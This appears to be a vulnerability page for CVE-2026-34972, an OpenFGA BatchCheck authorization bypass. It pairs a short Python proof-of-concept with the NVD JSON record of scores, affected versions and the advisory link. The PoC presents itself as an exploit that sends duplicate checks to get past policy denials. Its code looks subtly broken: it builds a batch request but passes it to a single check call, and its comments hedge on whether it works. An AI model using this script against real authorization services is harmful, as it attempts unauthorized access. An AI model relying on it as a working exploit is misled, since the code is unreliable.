CVE-2026-34972

# PoC for CVE-2026-34972: OpenFGA BatchCheck Policy Bypass # Description: Sending duplicate checks in a BatchCheck request may trigger improper policy enforcement. import openfga_sdk # Initialize client configuration configuration = openfga_sdk.Configuration(api_key="Bearer YOUR_API_KEY") api_instance = openfga_sdk.OpenFgaApi(openfga_sdk.ApiClient(configuration)) # Target tuple details user_id = "user:attacker" relation = "can_write" object_id = "resource:secret_data" # Construct a BatchCheck request with duplicate tuple checks body = openfga_sdk.ClientBatchCheckRequest( checks=[ openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id), openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id), openfga_sdk.ClientCheckRequest(user=user_id, relation=relation, object=object_id) ] ) try: # In vulnerable versions, this might bypass intended denials response = api_instance.check(body) print(f"Exploit successful. Response: {response}") except Exception as e: print(f"Exploit failed: {e}")

{"cve": {"id": "CVE-2026-34972", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:19.997", "lastModified": "2026-04-20T16:55:51.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. From 1.8.0 to 1.13.1, under specific conditions, BatchCheck calls with multiple checks sent for the same object, relation, and user combination can result in improper policy enforcement. This vulnerability is fixed in 1.14.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:*", "versionStartIncluding": "0.2.16", "versionEndExcluding": "0.2.62", "matchCriteriaId": "EABAAAEF-53E1-4ED5-9680-9748EF76A60A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.0", "versionEndExcluding": "1.14.0", "matchCriteriaId": "9D29D1A0-093C-4775-9409-BED9C6D4CE7E"}]}]}], "references": [{"url": "https://github.com/openfga/openfga/security/advisories/GHSA-jwvj-g8pc-cx45", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}